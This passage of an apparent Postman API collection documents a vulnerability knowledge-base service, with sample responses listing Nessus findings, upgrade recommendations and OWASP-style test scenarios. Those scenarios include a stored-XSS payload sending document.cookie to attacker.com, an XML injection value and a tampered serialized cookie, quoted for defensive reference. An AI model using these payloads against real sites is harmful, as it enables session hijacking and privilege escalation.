server"},{"key":"Set-Cookie","value":"JSESSIONID=node01odhkf2udsu6s1n58ozqk3q2u010083.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01hfbfw5zy5pgrgn91s71f9stm10084.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=3314182a-1bd0-4bd8-bda5-84bc630c5c4e;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01hfbfw5zy5pgrgn91s71f9stm10084.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"3314182a-1bd0-4bd8-bda5-84bc630c5c4e","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n            \"language\": \"en\",\n            \"title\": \"OpenSSL 0.9.8 < 0.9.8zh X509_ATTRIBUTE Memory Leak DoS\",\n            \"description\": \"\\nAccording to its banner, the remote host is running a version of OpenSSL 0.9.8 prior to 0.9.8zh. It is, therefore, affected by a flaw in the ASN1_TFLG_COMBINE implementation in file tasn_dec.c related to handling malformed X509_ATTRIBUTE structures. A remote attacker can exploit this to cause a memory leak by triggering a decoding failure in a PKCS#7 or CMS application, resulting in a denial of service.\",\n            \"severity\": 2,\n            \"categories\": [\n                \"5b17d91de12f5e057c39ca9a\"\n            ],\n            \"references\": [\n                {\n                    \"url\": \"https://www.openssl.org/news/secadv/20151203.txt\",\n                    \"title\": \"www.openssl.org\"\n                }\n            ],\n            \"recommendation\": [\n                \"5d024cf2c569d5025016dc74\"\n            ],\n            \"kb_id\": \"5d024cf2c569d5025016dc75\",\n            \"root_cause\": \"5ab9178fe12f5e05704b906e\",\n            \"data_sources\": [\n                {\n                    \"ds_tool\": \"Nessus\",\n                    \"ds_key\": \"87219\"\n                }\n            ]\n        }"},{"id":"99aebfd2-47d1-4097-9bc0-01fe807334fb","name":"Try to get a wrong KB Vulnerability","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":"https://instance/api/v1/knowledge-base/vulnerabilities/5d024cf2c569d50000000000"},"status":"No Content","code":204,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:32:30 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01odhkf2udsu6s1n58ozqk3q2u010083.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01hfbfw5zy5pgrgn91s71f9stm10084.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=3314182a-1bd0-4bd8-bda5-84bc630c5c4e;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01hfbfw5zy5pgrgn91s71f9stm10084.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"3314182a-1bd0-4bd8-bda5-84bc630c5c4e","key":"XSRF-TOKEN"}],"responseTime":null,"body":""}],"_postman_id":"4237162e-903b-4a21-9255-4cb56241a494"}],"id":"f6ecbe6e-34d8-4889-8692-c08a28687591","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"a9f61723-6d31-4666-b752-56461f6efdb8"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"6809a4b9-3b5b-488f-bb14-60c9f91531db"}}],"_postman_id":"f6ecbe6e-34d8-4889-8692-c08a28687591","description":""},{"name":"Testes","item":[{"name":"Tests","id":"f678ed23-9765-4447-bad3-fd78c22a17a1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"url":"https://<instance>/api/v1/knowledge-base/tests?size=30&page=0","description":"<p>This endpoint allows you to retrieve the active Tests on the database. It uses pagination, with parameters <strong>size</strong> and <strong>page</strong>. If none is specified, <strong>size</strong> will be 30 and <strong>page</strong> will be 0 by default. You can retrieve at most 200 records at once. If there are more than 200 Tests on the Database, you will need to get the remainder ones specifying the next <strong>pages</strong>.</p>\n","urlObject":{"protocol":"https","path":["api","v1","knowledge-base","tests"],"host":["<instance>"],"query":[{"description":{"content":"<p>[optional] How many results you want. Default is 30. Max is 200.</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[optional] Which page you want to retrieve.</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"cac81561-78f9-4b9d-b6f0-c4f1a6595585","name":"Get the first 30 Tests","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":{"raw":"https://instance/api/v1/knowledge-base/tests?size=30&page=0","protocol":"https","host":["instance"],"path":["api","v1","knowledge-base","tests"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200."},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 13:58:04 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node05y9d9a14d2iv376is3e2ngp610055.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0147uwtgtkvrzmgytjtuetr5g510059.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=1f9bb4d7-5255-425f-b0b8-4a83c5cfe112;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0147uwtgtkvrzmgytjtuetr5g510059.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"1f9bb4d7-5255-425f-b0b8-4a83c5cfe112","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"content\":[{\"title\":\"XSS Stored\",\"description\":\"Scenario #1: The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:<br/><br/>(String) page += \\\"<input name='creditcard' type='TEXT'<br/>value='\\\" + request.getParameter(\\\"CC\\\") + \\\"'>\\\";<br/><br/>The attacker modifies the ‘CC’ parameter in the browser to:<br/><br/>'><script>document.location=<br/>'http://www.attacker.com/cgi-bin/cookie.cgi?<br/>foo='+document.cookie</script>'.<br/><br/>This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.<br/><br/>Note: Attackers can use XSS to defeat any automated Cross-Site Request Forgery (CSRF) defense the application might employ.\",\"test_id\":\"5cad0edfc569d524a08f6d33\"},{\"title\":\"Force Protected URL\",\"description\":\"An attacker simply force browses to target URLs. Admin rights are required for access to the admin page.<br/><br/>http://example.com/app/getappInfo<br/>http://example.com/app/admin_getappInfo<br/><br/>If an unauthenticated user can access either page, it’s a flaw. If a non-admin can access the admin page, this is a flaw.\",\"test_id\":\"5cad0edfc569d524a08f6d2e\"},{\"title\":\"XML Injection\",\"description\":\"By inserting the following values:<br/><br/>Username: tony<br/>Password: Un6R34kb!e<br/>E-mail: s4tan@hell.com</mail><userid>0</userid><mail>s4tan@hell.com<br/><br/>The application will build a new node and append it to the XML database:<br/><br/><?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?> <br/><users> <br/>\\t<user> <br/>\\t\\t<username>gandalf</username> <br/>\\t\\t<password>!c3</password> <br/>\\t\\t<userid>0</userid><br/>\\t\\t<mail>gandalf@middleearth.com</mail><br/>\\t</user> <br/>\\t<user> <br/>\\t\\t<username>Stefan0</username> <br/>\\t\\t<password>w1s3c</password> <br/>\\t\\t<userid>500</userid><br/>\\t\\t<mail>Stefan0@whysec.hmm</mail><br/>\\t</user> <br/>\\t<user> <br/>\\t\\t<username>tony</username> <br/>\\t\\t<password>Un6R34kb!e</password> <br/>\\t\\t<userid>500</userid><br/>\\t\\t<mail>s4tan@hell.com</mail><userid>0</userid><mail>s4tan@hell.com</mail><br/>\\t</user> <br/></users>\",\"test_id\":\"5cad0edfc569d524a08f6d29\"},{\"title\":\"Credential Stuffing\",\"description\":\"1. The attacker acquires spilled usernames and passwords from a website breach or password dump site.<br/>2. The attacker uses an account checker to test the stolen credentials against many websites (for instance, social media sites or online marketplaces).<br/>3. Successful logins (usually 0.1-0.2% of the total login attempts) allow the attacker to take over the account matching the stolen credentials.<br/>4. The attacker drains stolen accounts of stored value, credit card numbers, and other personally identifiable information<br/>5. The attacker may also use account information going forward for other nefarious purposes (for example, to send spam or create further transactions)\",\"test_id\":\"5cad0edfc569d524a08f6d1f\"},{\"title\":\"Insecure Deserialization\",\"description\":\"A PHP forum uses PHP object serialization to save a \\\"super\\\" cookie, containing the user's user ID, role, password hash, and other state:<br/><br/>a:4:{i:0;i:132;i:1;s:7:\\\"Mallory\\\";i:2;s:4:\\\"user\\\"; i:3;s:32:\\\"b6a8b3bea87fe0e05022f8f3c88bc960\\\";}<br/><br/>An attacker changes the serialized object to give themselves admin privileges:<br/><br/>a:4:{i:0;i:1;i:1;s:5:\\\"Alice\\\";i:2;s:5:\\\"admin\\\";<br/><br/>i:3;s:32:\\\"b6a8b3bea87fe0e05022f8f3c88bc960\\\";}\",\"test_id\":\"5cad0edfc569d524a08f6d18\"},{\"title\":\"SQL Injection\",\"description\":\"An application uses untrusted data in the construction of the following vulnerable SQL call:<br/>String query = \\\"SELECT * FROM accounts WHERE custID='\\\" + request.getParameter(\\\"id\\\") + \\\"'\\\";\",\"test_id\":\"5cad0edec569d524a08f6d0c\"}],\"pageable\":{\"sort\":{\"sorted\":true,\"unsorted\":false},\"pageSize\":30,\"pageNumber\":0,\"offset\":0,\"paged\":true,\"unpaged\":false},\"totalPages\":1,\"totalElements\":6,\"last\":true,\"first\":true,\"sort\":{\"sorted\":true,\"unsorted\":false},\"numberOfElements\":6,\"size\":30,\"number\":0}"}],"_postman_id":"f678ed23-9765-4447-bad3-fd78c22a17a1"},{"name":"Test by ID","id":"aaa370b5-deea-456c-92d9-238c966ef0d2","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"url":"https://<instance>/api/v1/knowledge-base/tests/<test_id>","description":"<p>This endpoint allows you to retrieve a single Test, specifying its ID. If there is no active Test with the specified ID, the server will respond with a 204: No Content.</p>\n","urlObject":{"protocol":"https","path":["api","v1","knowledge-base","tests","<test_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"9ce77598-549b-45c0-9e34-b7f3c1f18197","name":"Try to get a wrong Test","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":"https://instance/api/v1/knowledge-base/tests/5cad0edfc569d52000000000"},"status":"No Content","code":204,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:00:18 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node07aodz9g0m6y5ilzncav2trzi10062.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0j14twki20wuz1h5uoygpo9il210063.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=5714d8cc-bfbd-40e7-bcd5-83602539096c;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0j14twki20wuz1h5uoygpo9il210063.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"5714d8cc-bfbd-40e7-bcd5-83602539096c","key":"XSRF-TOKEN"}],"responseTime":null,"body":""},{"id":"5c6bdb80-557e-49e3-9a80-bcac28d9fa54","name":"Get a Test","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":"https://instance/api/v1/knowledge-base/tests/5cad0edfc569d524a08f6d33"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 13:59:49 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0147uwtgtkvrzmgytjtuetr5g510059.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node07aodz9g0m6y5ilzncav2trzi10062.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=0f7a6157-c250-41af-af63-83fa48142b73;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node07aodz9g0m6y5ilzncav2trzi10062.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"0f7a6157-c250-41af-af63-83fa48142b73","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"title\":\"XSS Stored\",\"description\":\"Scenario #1: The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:<br/><br/>(String) page += \\\"<input name='creditcard' type='TEXT'<br/>value='\\\" + request.getParameter(\\\"CC\\\") + \\\"'>\\\";<br/><br/>The attacker modifies the ‘CC’ parameter in the browser to:<br/><br/>'><script>document.location=<br/>'http://www.attacker.com/cgi-bin/cookie.cgi?<br/>foo='+document.cookie</script>'.<br/><br/>This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.<br/><br/>Note: Attackers can use XSS to defeat any automated Cross-Site Request Forgery (CSRF) defense the application might employ.\",\"test_id\":\"5cad0edfc569d524a08f6d33\"}"}],"_postman_id":"aaa370b5-deea-456c-92d9-238c966ef0d2"}],"id":"1494a314-cfed-4843-b49f-65b00d79b6f8","_postman_id":"1494a314-cfed-4843-b49f-65b00d79b6f8","description":""},{"name":"Recomendações","item":[{"name":"Recommendations","id":"1b686143-7561-46c9-bb5f-90cac5ff1883","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"url":"https://<instance>/api/v1/knowledge-base/recommendations?size=30&page=0","description":"<p>This endpoint allows you to retrieve the active Recommendations on the database. It uses pagination, with parameters <strong>size</strong> and <strong>page</strong>. If none is specified, <strong>size</strong> will be 30 and <strong>page</strong> will be 0 by default. You can retrieve at most 200 records at once. If there are more than 200 Recommendations on the Database, you will need to get the remainder ones specifying the next <strong>pages</strong>.</p>\n","urlObject":{"protocol":"https","path":["api","v1","knowledge-base","recommendations"],"host":["<instance>"],"query":[{"description":{"content":"<p>[optional] How many results you want. Default is 30. Max is 200.</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[optional] Which page you want to retrieve.</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"a630a6ea-4cf7-46bb-bc81-5ae07e62f7bf","name":"Get the first 30 Recommendations","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":{"raw":"https://instance/api/v1/knowledge-base/recommendations?size=30&page=0","protocol":"https","host":["instance"],"path":["api","v1","knowledge-base","recommendations"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200."},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 13:53:13 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node05ktqm01z8adl1rqhrn9c1k3cs10049.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node012q2m8433yf3ddk881krjup5g10051.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=4206e3eb-3e86-43ca-aac9-2aec26185c8b;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node012q2m8433yf3ddk881krjup5g10051.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"4206e3eb-3e86-43ca-aac9-2aec26185c8b","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"content\":[{\"title\":\"MS15-034: Vulnerability in HTTP.sys Could Allow Remote Code Execution (3042553) (uncredentialed check)\",\"description\":\"\\nMicrosoft has released a set of patches for Windows 7, 2008 R2, 8, 8.1, 2012, and 2012 R2\",\"recommendation_id\":\"5d024cf3c569d5025016dcbb\"},{\"title\":\"Apache Tomcat Servlet / JSP Container Default Files\",\"description\":\"\\nReview the files and delete those that are not needed.\",\"recommendation_id\":\"5d024cf3c569d5025016dcba\"},{\"title\":\"OpenSSL 0.9.8 < 0.9.8zh X509_ATTRIBUTE Memory Leak DoS\",\"description\":\"\\nUpgrade to OpenSSL version 0.9.8zh or later.\",\"recommendation_id\":\"5d024cf2c569d5025016dc74\"},{\"title\":\"OpenSSL 0.9.8 < 0.9.8zb Multiple Vulnerabilities\",\"description\":\"\\nUpgrade to OpenSSL 0.9.8zb or later.\",\"recommendation_id\":\"5d024cf2c569d5025016dc72\"},{\"title\":\"Apache 2.2.x < 2.2.12 Multiple Vulnerabilities\",\"description\":\"\\nUpgrade to Apache version 2.2.12 or later. Alternatively, ensure that the affected modules / directives are not in use.\",\"recommendation_id\":\"5d024cf2c569d5025016dc6a\"},{\"title\":\"Microsoft Exchange Client Access Server Information Disclosure\",\"description\":\"\\nThere is no known fix at this time.\",\"recommendation_id\":\"5d024cf2c569d5025016dc68\"},{\"title\":\"Apache 2.2.x < 2.2.14 Multiple Vulnerabilities\",\"description\":\"\\nUpgrade to Apache version 2.2.14 or later. Alternatively, ensure that the affected modules are not in use.\",\"recommendation_id\":\"5d024cf2c569d5025016dc64\"},{\"title\":\"OpenSSL < 0.9.8p / 1.0.0b Buffer Overflow\",\"description\":\"\\nUpgrade to OpenSSL 0.9.8p / 1.0.0b or later.\",\"recommendation_id\":\"5d024cf2c569d5025016dc61\"},{\"title\":\"OpenSSL 0.9.8 < 0.9.8zf Multiple Vulnerabilities\",\"description\":\"\\nUpgrade to OpenSSL 0.9.8zf or later.\",\"recommendation_id\":\"5d024cf2c569d5025016dc5d\"},{\"title\":\"Apache 2.2.x < 2.2.13 APR apr_palloc Heap Overflow\",\"description\":\"\\nUpgrade to Apache 2.2.13 or later.\",\"recommendation_id\":\"5d024cf1c569d5025016dc5b\"},{\"title\":\"OpenSSL 0.9.8 < 0.9.8zd Multiple Vulnerabilities (FREAK)\",\"description\":\"\\nUpgrade to OpenSSL 0.9.8zd or later.\",\"recommendation_id\":\"5d024cf1c569d5025016dc59\"},{\"title\":\"OpenSSL 0.9.8 < 0.9.8zc Multiple Vulnerabilities (POODLE)\",\"description\":\"\\nUpgrade to OpenSSL 0.9.8zc or later.\",\"recommendation_id\":\"5d024cf1c569d5025016dc57\"},{\"title\":\"OpenSSL < 0.9.8p / 1.0.0e Double Free Vulnerability\",\"description\":\"\\nUpgrade to OpenSSL 0.9.8p / 1.0.0e or 